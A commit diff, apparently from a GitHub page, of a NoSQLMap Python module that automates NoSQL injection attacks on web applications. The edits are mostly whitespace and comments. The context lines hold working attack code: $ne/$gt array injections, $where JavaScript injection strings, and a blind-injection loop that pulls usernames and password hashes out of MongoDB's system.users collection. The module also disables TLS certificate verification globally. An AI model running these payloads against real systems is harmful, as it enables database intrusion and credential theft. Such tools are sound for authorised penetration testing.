22# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
33# See the file 'doc/COPYING' for copying permission
44
5+ 56import urllib
67import urllib2
78import string
1112import time
1213import random
1314
14- #Fix for dealing with self-signed certificates. This is wrong and highly discouraged, but it's a hacking tool, so it's fixed with a hack. Get over it :-)
15+ #Fix for dealing with self-signed certificates. This is wrong and highly discouraged, to be revisited in stable branch
1516
1617if version_info >= (2 , 7 , 9 ):
1718 import ssl
1819 ssl ._create_default_https_context = ssl ._create_unverified_context
1920
21+ 2022def getApps (webPort ,victim ,uri ,https ,verb ,requestHeaders ):
2123 print "Web App Attacks (GET)"
2224 print "==============="
@@ -44,7 +46,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
4446 global int24
4547 int24 = False
4648
47- #Verify app is working.
49+ #Verify app is working.
4850 print "Checking to see if site at " + str (victim ).strip () + ":" + str (webPort ).strip () + str (uri ).strip () + " is up..."
4951
5052 if https == "OFF" :
@@ -83,8 +85,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
8385 injectString = randInjString (int (injectSize ))
8486 print "Using " + injectString + " for injection testing.\n "
8587
86- #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
87- #Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
88+ #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
89+ #Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
8890 if "?" not in appURL :
8991 print "No URI parameters provided for GET request...Check your options.\n "
9092 raw_input ("Press enter to continue..." )
@@ -113,7 +115,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
113115 else :
114116 print "Test 1: PHP/ExpressJS != associative array injection"
115117
116- #Test for errors returned by injection
118+ #Test for errors returned by injection
117119 req = urllib2 .Request (uriArray [1 ], None , requestHeaders )
118120 errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
119121
@@ -162,7 +164,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
162164 else :
163165 testNum += 1
164166
165- #Start a single record attack in case the app expects only one record back
167+ #Start a single record attack in case the app expects only one record back
166168 print "\n "
167169 if verb == "ON" :
168170 print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n "
@@ -344,6 +346,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
344346 raw_input ("Press enter to continue..." )
345347 return ()
346348
349+ 347350def postApps (victim ,webPort ,uri ,https ,verb ,postData ,requestHeaders ):
348351 print "Web App Attacks (POST)"
349352 print "==============="
@@ -366,7 +369,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
366369 global gtDict
367370 testNum = 1
368371
369- #Verify app is working.
372+ #Verify app is working.
370373 print "Checking to see if site at " + str (victim ) + ":" + str (webPort ) + str (uri ) + " is up..."
371374
372375 if https == "OFF" :
@@ -423,8 +426,8 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
423426 injectString = randInjString (int (injectSize ))
424427 print "Using " + injectString + " for injection testing.\n "
425428
426- #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
427- #Add error handling for Non-200 HTTP response codes if random strings freak out the app.
429+ #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
430+ #Add error handling for Non-200 HTTP response codes if random strings freak out the app.
428431 postData .update ({injOpt :injectString })
429432 if verb == "ON" :
430433 print "Checking random injected parameter HTTP response size sending " + str (postData ) + "...\n "
@@ -444,7 +447,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
444447 else :
445448 print "Random value variance: " + str (randNormDelta ) + "\n "
446449
447- #Generate not equals injection
450+ #Generate not equals injection
448451 neDict = postData
449452 neDict [injOpt + "[$ne]" ] = neDict [injOpt ]
450453 del neDict [injOpt ]
@@ -467,10 +470,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
467470 testNum += 1
468471 print "\n "
469472
470- #Delete the extra key
473+ #Delete the extra key
471474 del postData [injOpt + "[$ne]" ]
472475
473- #generate $gt injection
476+ #generate $gt injection
474477 gtDict = postData
475478 gtDict .update ({injOpt :"" })
476479 gtDict [injOpt + "[$gt]" ] = gtDict [injOpt ]
@@ -530,7 +533,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
530533 testNum += 1
531534 print "\n "
532535
533- #Start a single record attack in case the app expects only one record back
536+ #Start a single record attack in case the app expects only one record back
534537 postData .update ({injOpt :"a'; return db.a.findOne(); var dummy='!" })
535538 body = urllib .urlencode (postData )
536539 req = urllib2 .Request (appURL ,body , requestHeaders )
@@ -706,6 +709,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
706709 raw_input ("Press enter to continue..." )
707710 return ()
708711
712+ 709713def errorTest (errorCheck ,testNum ):
710714 global possAddrs
711715 global httpMethod
@@ -811,6 +815,7 @@ def checkResult(baseSize,respSize,testNum,verb,postData):
811815 possAddrs .append (str (postData ))
812816 return
813817
818+ 814819def randInjString (size ):
815820 print "What format should the random string take?"
816821 print "1-Alphanumeric"
@@ -959,6 +964,7 @@ def buildUri(origUri, randValue):
959964
960965 return uriArray [0 ]
961966
967+ 962968def getDBInfo ():
963969 curLen = 0
964970 nameLen = 0
@@ -1028,7 +1034,7 @@ def getDBInfo():
10281034 if getUserInf .lower () == "y" :
10291035 charCounter = 0
10301036 nameCounter = 0
1031- #find the total number of users on the database
1037+ #find the total number of users on the database
10321038 while gotUserCnt == False :
10331039 usrCntUri = uriArray [16 ].replace ("---" ,"var usrcnt = db.system.users.count(); if (usrcnt == " + str (usrCount ) + ") { return true; } var dum='a" )
10341040
@@ -1042,11 +1048,11 @@ def getDBInfo():
10421048 else :
10431049 usrCount += 1
10441050
1045- usrChars = 0 #total number of characters in username
1046- charCounterUsr = 0 #position in the character array-Username
1047- rightCharsUsr = 0 #number of correct characters-Username
1048- rightCharsHash = 0 #number of correct characters-hash
1049- charCounterHash = 0 #position in the character array-hash
1051+ usrChars = 0 #total number of characters in username
1052+ charCounterUsr = 0 #position in the character array-Username
1053+ rightCharsUsr = 0 #number of correct characters-Username
1054+ rightCharsHash = 0 #number of correct characters-hash
1055+ charCounterHash = 0 #position in the character array-hash
10501056 username = ""
10511057 pwdHash = ""
10521058 charCountUsr = False
@@ -1055,14 +1061,14 @@ def getDBInfo():
10551061 while retrUsers < usrCount :
10561062 if retrUsers == 0 :
10571063 while charCountUsr == False :
1058- #different query to get the first user vs. others
1064+ #different query to get the first user vs. others
10591065 usrUri = uriArray [16 ].replace ("---" ,"var usr = db.system.users.findOne(); if (usr.user.length == " + str (usrChars ) + ") { return true; } var dum='a" + "&" )
10601066
10611067 req = urllib2 .Request (usrUri , None , requestHeaders )
10621068 lenUri = int (len (urllib2 .urlopen (req ).read ()))
10631069
10641070 if lenUri == baseLen :
1065- #Got the right number of characters
1071+ #Got the right number of characters
10661072 charCountUsr = True
10671073
10681074 else :
@@ -1085,7 +1091,7 @@ def getDBInfo():
10851091
10861092 retrUsers += 1
10871093 users .append (username )
1088- #reinitialize all variables and get ready to do it again
1094+ #reinitialize all variables and get ready to do it again
10891095 #print str(retrUsers)
10901096 #print str(users)
10911097 charCountUsr = False
@@ -1110,20 +1116,20 @@ def getDBInfo():
11101116
11111117 hashes .append (pwdHash )
11121118 print "Got user:hash " + users [0 ] + ":" + hashes [0 ]
1113- #reinitialize all variables and get ready to do it again
1119+ #reinitialize all variables and get ready to do it again
11141120 charCounterHash = 0
11151121 rightCharsHash = 0
11161122 pwdHash = ""
11171123 else :
11181124 while charCountUsr == False :
1119- #different query to get the first user vs. others
1125+ #different query to get the first user vs. others
11201126 usrUri = uriArray [16 ].replace ("---" ,"var usr = db.system.users.findOne({user:{$nin:" + str (users ) + "}}); if (usr.user.length == " + str (usrChars ) + ") { return true; } var dum='a" + "&" )
11211127
11221128 req = urllib2 .Request (usrUri , None , requestHeaders )
11231129 lenUri = int (len (urllib2 .urlopen (req ).read ()))
11241130
11251131 if lenUri == baseLen :
1126- #Got the right number of characters
1132+ #Got the right number of characters
11271133 charCountUsr = True
11281134
11291135 else :
@@ -1145,7 +1151,7 @@ def getDBInfo():
11451151 charCounterUsr += 1
11461152
11471153 retrUsers += 1
1148- #reinitialize all variables and get ready to do it again
1154+ #reinitialize all variables and get ready to do it again
11491155
11501156 charCountUsr = False
11511157 rightCharsUsr = 0
@@ -1168,7 +1174,7 @@ def getDBInfo():
11681174 users .append (username )
11691175 hashes .append (pwdHash )
11701176 print "Got user:hash " + users [retrUsers - 1 ] + ":" + hashes [retrUsers - 1 ]
1171- #reinitialize all variables and get ready to do it again
1177+ #reinitialize all variables and get ready to do it again
11721178 username = ""
11731179 charCounterHash = 0
11741180 rightCharsHash = 0
0 commit comments